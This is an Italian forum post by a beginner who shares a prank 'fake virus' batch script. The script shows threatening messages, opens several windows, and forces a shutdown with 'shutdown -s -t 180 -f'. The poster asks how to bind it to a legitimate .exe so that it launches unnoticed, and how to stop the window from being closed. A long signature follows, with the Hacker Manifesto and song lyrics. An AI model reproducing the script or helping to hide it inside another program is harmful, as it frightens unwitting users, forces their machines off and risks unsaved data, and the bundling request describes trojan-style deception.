| |
| Salve a tutti sn nuovo del forum volevo chiedervi se conoscete o se esiste un programma x unire un batch cn un exe. Ho creato uno dei soliti finti virus x iniziare a fare pratica cn i comandi dos e l'ho trasformato ank i exe. è carino xò volevo unirlo ad un programma exe così da far avviare il finto virus cn l'exe. grz in anticipo qui c'è il finto virus cm prima volta cm sn andato?? CODICE@ECHO OFF
@rem Batch virus By Golden Dragon (Neder Ghadhab) cls echo LEGGIMIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! echo nn chiudere la finestra o ti becca un bel virus echo scrivi exit e continua a leggere segui le istruzione e tutto si risolve altrimenti windows nn funzionerà più.
command
echo nn provare a chiudere la finestra altrimenti mi attivo echo ciaoo Mi chiamo Msn.exe.bat e sono il virus ideato da Neder. Nn sn nnt di che ma ti complicherò la vita! echo ti consiglio di salvare tutti i tuoi file e i dati ti do 15 minuti di tempo per salvare e sistemare tutto!Dp di che mi metto a lavoro! echo EHI TI AVVERTO! PROVA A SPEGNERE IL PC SNZ PERMESSO E IO TI DISTRUGGO! SE MI OBBEDIRAI TROVERò UN MODO X AIUTARTI A NN ROVINARE NNT! echo se mi seguirai allora andrà bene se farai l'opposto di addio a tutti i tuoi file XD pause...premere invio e nn uscire perchè altrimenti mi attivo echo Riuscirai a chiudere tutto?? echo facciamo un gioco?? se rispondi giusto allora nn ti faccio nnt! INIZIAMO!
pause...
echo allora leggi ciò che appare e dimmi quale delle seguenti scritte è il tuo "indirizzo delle porte per la connessione a internet"
ipconfig
echo vediamo se sai riportarmi qst tabella, falla riapparire echo scrivi la tua risposta e premi invio dp di che scrivi exit
command
echo nn ci riesci?? echo allora mi dispiace per te qui c'è un problema echo echo echo START cd C:Documents and settings%-USERNAME%Desktopmsn plus9.zip|msgbox.vbs echo oh oh!Sbaglia ancora e il tu Computer si rompe! echo mi dispiace nn 6 abbastanza bravo echo chiudi la seconda finestra di dos aperta e continua, hai ancora possibilità di far sistemare tutto pause..premi un tasto echo inizia a salvare i tuoi dati pause..premi un tasto echo la prossima volta nn farmi arrabbiare! pause..premi un tasto echo ti saluto! ciaoooooo ahahah! pause echo AAAAAAAHAHAHAHAH HAI AVUTO PAURA??? NON DEVI SCHERZARE TROPPO CN ME! TI SALUTO CIAOOOO echo però nn scherzavo qnd dicevo che ti si spegneva il PC salva tutto hai 3 minuti ciao ciauuu! pause...premi un tasto qualunque così esci start start start start start start start start start start start
shutdown -s -t 180 -f
exit avrei voluto aggiungere un modo x nn far chiudere la finestra di dos ma nn so cm fare. mi dareste una mano ank in qst?? grz 
 Che roba da non crederci!Io Non Ho Particolari Talenti. Sono Solo Appassionatamente Curioso (A.Einstein - Scienziato)Questo ora questo è il nostro mondo... il mondo dell’elettrone e del commutatore, la bellezza del baud. Noi facciamo uso di un servizio che esiste già senza pagare per quello che potrebbe essere compreso se non fosse gestito da avidi profittatori, e voi ci chiamate criminali.
Noi esploriamo… e voi ci chiamate criminali.
Noi cerchiamo la conoscenza… e voi ci chiamate criminali.
Noi esistiamo senza colore di pelle, senza nazionalità, senza credenze religiose e voi ci chiamate criminali.
Voi costruite bombe atomiche, voi fate la guerra, voi uccidete, voi ingannate, ci mentite e tentate di farci credere che è per il nostro bene, eppure siamo noi i criminali.
Si, io sono un criminale. Il mio crimine è la mia curiosità. Il mio crimine è quello di giudicare le gente in base a quello che pensa e dice, non per come appare. La mia colpa è quella di essere più furbo di voi, e per questo non potrete mai perdonarmi.
Io sono un Hacker e questo è il mio manifesto. Potete fermare questo individuo, ma non potete fermarci tutti… dopo tutto, siamo tutti uguali. Adoro questo sito! Vacci anche tu se non lo conosci! divertiti! Lamerz...Vivi e soffri per ciò in cui credi Lavora come se non avessi bisogno di soldi Balla come se nessuno ti stesse guardando Canta come se nessuno ti stesse ascoltando Goditi ogni attimo della tua vita Pentiti solo di ciò che non hai fatto Vivi come se dovessi morire domani Pensa come se non dovessi morire mai Ricorda che niente è impossibile Se esiste un limite,raggiungetelo per poi superarlo...          "Detto ebraico:oluc li rep itrednerp a attaf oh'l ec atlovats ehcna...Fa come me, mandalo a ki non capirà un cazzo finchè non gli diranno leggilo al contrario!!!" Io non sono normale perchè cerco di evitare la disco Non sono normale perchè non ascolto il tuo stesso disco Io no soy normal perchè non mi piace il rischio E con certa gente stronza io non mi immischio, zio [...] Io non sono normale perchè ho rischiato di digiunare Invece di creare una base su cui poter contare Ho lasciato che un sogno mi portasse a pensare Di poter mollare quello per il quale non sono normale
[Mas-t - No Soy Normal] |
| | |